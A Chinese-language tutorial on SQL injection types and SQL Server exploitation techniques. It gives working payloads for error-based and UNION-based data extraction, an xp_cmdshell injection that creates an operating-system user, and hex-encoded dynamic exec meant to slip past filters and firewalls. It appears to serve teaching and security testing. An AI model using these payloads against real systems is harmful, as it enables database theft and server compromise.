sql注入的三种方式是：1、数字型注入，当输入的参数为整型时，可能存在数字型注入漏洞；2、字符型注入，当输入参数为字符串时，可能存在字符型注入漏洞；3、搜索型注入，在进行数据搜索时没过滤搜索参数。

本教程操作环境：windows7系统、MysqL8.0版、Dell G3电脑。

sql 注入原理

sql注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序，而这些输入大都是sql语法里的一些组合，通过执行sql语句进而执行攻击者所要的操作，其主要原因是程序没有细致地过滤用户输入的数据，致使非法数据侵入系统。

sql 注入分类

1. 数字型注入

当输入的参数为整型时，则有可能存在数字型注入漏洞。

假设存在一条 URL 为：HTTP://www.aaa.com/test.PHP?id=1

可以对后台的 sql 语句猜测为：

SELECT * FROM table WHERE id=1

判断数字型漏洞的 sql 注入点：

① 先在输入框中输入一个单引号 '

这样的 sql 语句就会变为：

SELECT * FROM table WHERE id=1'，

不符合语法，所以该语句肯定会出错，导致脚本程序无法从数据库获取数据，从而使原来的页面出现异常。

② 在输入框中输入 and 1 = 1

sql语句变为：

SELECT * FROM table WHERE id=1 and 1 = 1

语句正确，执行正常，返回的数据与原始请求无任何差异。

③ 在数据库中输入 and 1 = 2

sql 语句变为：

SELECT * FROM table WHERE id=1 and 1 = 2

虽然语法正确，语句执行正常，但是逻辑错误，因为 1 = 2 为永假，所以返回数据与原始请求有差异。

如果以上三个步骤全部满足，则程序就可能存在数字型 sql 注入漏洞。

2. 字符型注入

当输入参数为字符串时，则可能存在字符型注入漏洞。数字型与字符型注入最大的区别在于：数字型不需要单引号闭合，而字符型一般需要使用单引号来闭合。

字符型注入最关键的是如何闭合 sql 语句以及注释多余的代码。

假设后台的 sql 语句如下：

SELECT * FROM table WHERE username = 'admin'

判断字符型漏洞的 sql 注入点：

① 还是先输入单引号 admin' 来测试

这样的 sql 语句就会变为：

SELECT * FROM table WHERE username = 'admin''。

页面异常。

② 输入：admin' and 1 = 1 --

注意：在 admin 后有一个单引号 '，用于字符串闭合，最后还有一个注释符 --(两条杠后面还有一个空格！！！)。
sql 语句变为：

SELECT * FROM table WHERE username = 'admin' and 1 = 1 --

页面显示正确。

③ 输入：admin' and 1 = 2 --

sql 语句变为：<

SELECT * FROM table WHERE username = 'admin' and 1 = 2 --

页面错误。

满足上面三个步骤则有可能存在字符型 sql 注入。

3.搜索型注入

这是一类特殊的注入类型。这类注入主要是指在进行数据搜索时没过滤搜索参数，一般在链接地址中有 keyword=关键字 有的不显示在的链接地址里面，而是直接通过搜索框表单提交。此类注入点提交的 sql 语句，其原形大致为：select * from 表名 where 字段 like '%关键字%' 若存在注入，我们可以构造出类似与如下的sql注入语句进行爆破：select * from 表名 where 字段 like '%测试%' and '%1%'='%1%'

以下是一些常见的注入叫法：

• POST注入：注入字段在 POST 数据中

• Cookie注入：注入字段在 Cookie 数据中

• 延时注入：使用数据库延时特性注入

• 搜索注入：注入处为搜索的地方

• base64注入：注入字符串需要经过 base64 加密

常见数据库的注入

攻击者对于数据库注入，无非是利用数据库获取更多的数据或者更大的权限，利用的方式可以归结为以下几类：

• 查询数据

• 读写文件

• 执行命令

攻击者对于程序注入，无论任何数据库，无非都是在做这三件事，只不过不同的数据库注入的 sql 语句不一样罢了。

这里介绍三种数据库的注入：Oracle 11g、MysqL 5.1 和 sql Server 2008。

sql Server

1. 利用错误消息提取信息

sql Server 数据库是一个非常优秀的数据库，它可以准确地定位错误信息，这对攻击者来说是一件十分美好的事情，因为攻击者可以通过错误消息提取自己想要的数据。

① 枚举当前表或者列

假设选择存在这样一张表：

查询 root 用户的详细信息，sql 语句猜测如下：

SELECT * FROM user WHERE username = 'root' AND password = 'root'

攻击者可以利用 sql Server 特性来获取敏感信息，在输入框中输入如下语句：

' having 1 = 1 --

最终执行的 sql 语句就会变为：

SELECT * FROM user WHERE username = 'root' AND password = 'root' HAVING 1 = 1 --

那么 sql 的执行器可能会抛出一个错误：

攻击者就可以发现当前的表名为 user、而且存在字段 id。

攻击者可以利用此特性继续得到其他列名，输入如下语句：

' GROUP BY users.id HAVING 1 = 1 --

则 sql 语句变为：

SELECT * FROM user WHERE username = 'root' AND password = 'root' GROUP BY users.id HAVING 1 = 1 --

抛出错误：

由此可以看到包含列名 username。可以一次递归查询，知道没有错误消息返回位置，这样就可以利用 HAVING 字句得到当表的所有列名。

注：Select指定的每一列都应该出现在Group By子句中，除非对这一列使用了聚合函数

②. 利用数据类型错误提取数据

如果试图将一个字符串与非字符串比较，或者将一个字符串转换为另一个不兼容的类型，那么sql 编辑器将会抛出异常。

如下列 sql 语句：

SELECT * FROM user WHERE username = 'abc' AND password = 'abc' AND 1 > (SELECT TOP 1 username FROM users)

执行器错误提示：

这就可以获取到用户的用户名为 root。因为在子查询 SELECT TOP 1 username FROM users 中，将查询到的用户名的第一个返回，返回类型是 varchar 类型，然后要跟 int 类型的 1 比较，两种类型不同的数据无法比较而报错，从而导致了数据泄露。

利用此方法可以递归推导出所有的账户信息：

SELECT * FROM users WHERE username = 'abc' AND password = 'abc' AND 1 > (SELECT TOP 1 username FROM users WHERE not in ('root'))。

通过构造此语句就可以获得下一个 用户名；若把子查询中的 username 换成其他列名，则可以获取其他列的信息，这里就不再赘述。

2. 获取元数据

sql Server 提供了大量视图，便于取得元数据。可以先猜测出表的列数，然后用 UNION 来构造 sql 语句获取其中的数据。

如：

SELECT *** FROM *** WHERE id = *** UNION SELECT 1, TABLE_NAME FROM informatION_SCHEMA.TABLES

若当前表的列数为 2，则可以 UNION 语句获取当前数据库表。具体怎么猜测当前表的列数，后面进行描述。

一些常用的系统数据库视图：

3. ORDER BY 子句猜测列数

可以用 ORDER BY 语句来判断当前表的列数。

如：

① SELECT * FROM users WHERE id = 1——sql执行正常

②SELECT * FROM users WHERE id = 1 ORDER BY 1 (按照第一列排序)——sql执行正常

③ SELECT * FROM users WHERE id = 1 ORDER BY 2 (按照第二列排序)——sql执行正常

④ SELECT * FROM users WHERE id = 1 ORDER BY 3 (按照第三列排序)——sql 执行正常

⑤ SELECT * FROM users WHERE id = 1 ORDER BY 4 (按照第四列排序)——sql 抛出异常：

由此可以得出，当前表的列数只有 3 列，因为当按照第 4 列排序时报错了。在 Oracle 和 MysqL 数据库中同样适用此方法。

在得知列数后，攻击者通常会配合 UNION 关键字进行下一步的攻击。

4. UNION 查询

UNION 关键字将两个或多个查询结果组合为单个结果集，大部分数据库都支持 UNION 查询。但适用 UNION 合并两个结果有如下基本规则：

• 所有查询中的列数必须相同

• 数据类型必须兼容

① 用 UNION 查询猜测列数

不仅可以用 ORDER BY 方法来猜测列数，UNION 方法同样可以。

在之前假设的 user 表中有 5 列，若我们用 UNION 联合查询：

SELECT * FROM users WHERE id = 1 UNION SELECT 1

数据库会发出异常：

可以通过递归查询，直到无错误产生，就可以得知 User 表的查询字段数：

UNION SELECT 1,2、UNION SELECT 1,2,3

也可以将 SELECT 后面的数字改为 null、这样不容易出现不兼容的异常。

② 联合查询敏感信息

在得知列数为 4后，可以使用一下语句继续注入：

UNION SELECT 'x', null, null, null FROM SYSOBJECT WHERE xtype='U' (注：xtype=‘U’ 表示对象类型是表)

若第一列的数据类型不匹配，数据库会报错，那么可以递归查询，直到语句兼容。等到语句正常执行，就可以将 x 换为 sql 语句，查询敏感信息。

5. 利用sql Server 提供的系统函数

sql Server 提供了非常多的系统函数，利用该系统函数可以访问 sql Server 系统表中的信息，而无需使用 sql 查询语句。

如：

• SELECT suser_name()：返回用户的登录标识名

• SELECT user_name()：基于指定的标识号返回数据库用户名

• SELECT db_name()：返回数据库名

• SELECT is_member(‘db_owner’)：是否为数据库角色

• SELECT convert(int, ‘5’)：数据类型转换

6. 存储过程

存储过程 (Stored Procedure) 是在大型数据库系统中为了完成特定功能的一组 sql “函数”，如：执行系统命令、查看注册表、读取磁盘目录等。

攻击者最长使用的存储过程是 “xp_cmdshell”，这个存储过程允许用户执行操作系统命令。

例如：http://www.aaa.org/test.aspx?id=1 中存在注入点，那么攻击者就可以实施命令攻击：
http://www.aaa.org/test.aspx?id=1；exec xp_cmdshell 'net user test test /add'

最终执行的 sql 语句如下：

SELECT * FROM table WHERE id=1; exec xp_cmdshell 'net user test test /add'

分号后面的那一段语句就可以为攻击者在对方服务器上新建一个用户名为 test、密码为 test 的用户。

注：并不是任何数据库用户都可以使用此类存储过程，用户必须持有 CONTROL SERVER 权限。

常见的危险存储过程如下表：

另外，任何数据库在使用一些特殊的函数或存储过程时，都需要特定的权限。常见的sql Server 数据库的角色与权限如下：

7. 动态执行

sql Server 支持动态执行语句，用户可以提交一个字符串来执行 sql 语句。

如：exec('SELECT username, password FROM users')

也可以通过定义十六进制的 sql 语句，使用 exec 函数执行。大部分 Web 应用程序和防火墙都过滤了单引号，利用 exec 执行十六进制 sql 语句可以突破很多防火墙及防注入程序，如：

declare @query varchar(888)
select @query=0x73656C6563742031
exec(@query)

或者：

declare/**/@query/**/varchar(888)/**/select/**/@query=0x73656C6563742031/**/exec(@query)

相关推荐：《mysql教程》